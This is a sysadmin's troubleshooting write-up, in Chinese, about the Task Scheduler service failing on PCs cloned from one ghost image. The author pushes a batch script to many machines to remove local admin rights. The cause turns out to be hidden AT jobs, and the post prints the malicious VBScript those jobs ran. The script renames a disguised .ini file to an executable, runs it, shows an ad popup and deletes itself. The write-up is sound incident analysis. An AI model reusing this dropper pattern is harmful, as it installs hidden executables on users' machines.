計劃任務 服務 出錯處理案例

因管理需要,要用土炮清除Client電腦上的域用戶本機管理員權限. 沒有管理工具,不能用GPO.

移權限批處理:

net localgroup administrators | find /i "DOMAIN\"|find /v /i "domain admins"  | find /v /i "pcadms" >c:\localadmins.txt  && goto remove ||  goto end

:remove

date /t >>c:\localadmins.log

for /f %%a in (c:\localadmins.txt) do net localgroup administrators %%a /delete >>c:\localadmins.log

exit

:end

exit

遠程加排程:

for /f %%a in (lists.txt) do (

copy c:\removelocaladmins.bat \\%%a\c$

at \\%%a 12:00 /every:Wednesday c:\removelocaladmins.bat

)

結果:

隨後隨機檢查了幾台,發現有兩台排程未執行,顯示無法開始.

再查:

發現task schedule 服務未啟動.手動啟動提示 存取被拒.

查MS KB, Google 結果均不適用.雖然出錯提示啊什麼的一樣,但按上述的處理均不能解決.

暫停:

全面檢查排程執行情況,發現有30台以上電腦均有此現象.共同點為使用相同的GHO鏡像部署而來.

數量較多,必須解決,否則重裝系統工作量太大

取得此ghost,裝一台虛擬機進行測試.

果然,一裝完 task schedule 服務就掛了.

排錯過程:

檢查 task schedule 相關文件的正確性 --> 正常

檢查 task schedule 相關註冊表設定   --> 正常

重打SP3補丁,仍未修復.

一直顯示相同的錯誤,error 5: access denied

使用命令行schtasks.exe 檢查,發現異常.

發現有隱藏的任務.AT1 AT2 對任務進行檢查發現

at1.job at2.job都是執行 c:\windows\system32\prnctrl.vbs
prnctrl的內容為:

Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FileExists("C:\Program Files\Windows NT\hypertrm.ini") Then
objFSO.MoveFile "C:\Program Files\Windows NT\hypertrm.ini", "C:\Program Files\Windows NT\hypertrm32.exe"
End If
set WshShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FileExists("C:\Program Files\Windows NT\hypertrm32.exe") Then
WshShell.Run "C:\PROGRA~1\WINDOW~1\HYPERT~1.EXE"
End If
a = MsgBox("为了您的上网安全，推荐您使用114啦网址导航。", vbOKOnly & vbInformation, "安全提示")
Set Delfso = CreateObject("Scripting.FileSystemObject")
Delfso.DeleteFile(WScript.ScriptName)

從上面的內容來看,會將C:\Program Files\Windows NT\hypertrm.ini 改名為exe文件並執行. 不過這個ini的病毒文件應該事先被查殺了,所以 沒能

上述的異常排程導致了計劃任務服務無法啟動.

刪除後 task schedule 服務可正常啟動.